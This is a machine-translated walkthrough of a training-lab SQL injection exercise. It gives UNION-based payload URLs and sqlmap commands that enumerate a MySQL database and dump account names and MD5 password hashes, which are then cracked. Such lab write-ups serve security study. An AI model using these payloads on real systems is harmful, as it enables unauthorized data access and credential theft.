author ： susususuao
disclaimer ： This article is for study only , Illegal activities are strictly prohibited , Any consequences shall be borne by the user himself .

One ： Ideas

Background introduction
Safety Engineer " Mohist " I've been practicing recently SQL Manual injection vulnerability , I have just set up a shooting range environment Nginx+PHP+MySQL,PHP The code does not filter the parameters submitted by the client . Practice heartily SQL Manual injection .
technological process

1. master SQL Principle of injection ;
2. Understand the method of manual injection ;
3. understand MySQL Data structure of ;
4. Understand the string MD5 encryption ;

Two ： Method

Method 1 ： Manual injection

1. After opening the range and entering the environment, a landing page is found .( I thought this page had an injection point , All kinds of attempts ended in vain , When looking at the source code, I found that there is a new URL)

home page :

Home page source code :
new URL Connect :

2. Find familiar character parameters ?id=1 After a meal of operation, it was found that id=1 and 1=1 The page returns to normal , When and 1=2 The page returns an exception , It indicates that there is an injection vulnerability .

3. Start manual injection

• adopt order by Parameter search exists 4 Number of columns

http://youIP/new_list.php?id=1  order by 4

• Find displayed as ( Why is it here -1 Not much to explain )

http://youIP/new_list.php?id=-1  union select 1,2,3,4

- Blast the name of the warehouse

http://youIP/new_list.php?id=-1  union select 1,2,database(),4

Database name ：mozhe_Discuz_StormGroup

- Explosion meter

http://youIP/new_list.php?id=-1 union select  1, 2,group_concat(table_name) ,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' 

Table name ：StormGroup_member,notice.( Guess the first table is the one we want )

- Burst train

http://youIP/new_list.php?id=-1 union select  1, 2,group_concat(column_name) ,4 from information_schema.columns where table_name='StormGroup_member'

Field ：id,name,password,status

- Pop field
Found two accounts , The user names are mozhe, The passwords are different .

http://youIP/new_list.php?id=-1 union select  1, 2,group_concat(concat_ws('~',name,password)) ,4 from mozhe_Discuz_StormGroup.StormGroup_member

Field ：mozhe~ 356f589a7df439f6f744ff19bb8092c0,mozhe~ c8e100ea135c6a8346b3e0747eb78060

- MD5 Decrypt
Decrypt the first password

Don't disable the password of this account

Decrypt the second password

This can be logged in , And we found that there are KEY.

Method 2 ： Tool injection (sqlmap)

• Burst database name and current user

sqlmap  -u "http://youIP/new_list.php?id=1" -b --current-db  --current-user 

• Explosion meter

sqlmap  -u "http://youIP/new_list.php?id=1"  -D mozhe_Discuz_StormGroup -tables

• Burst train

sqlmap  -u "http://youIP/new_list.php?id=1"  -D mozhe_Discuz_StormGroup -T StormGroup_member  -columns

• Burst field information

sqlmap  -u "http://youIP/new_list.php?id=1"  -D mozhe_Discuz_StormGroup -T StormGroup_member  -C name,password --dump

Finally, we are going to MD5 Decrypt to get the password .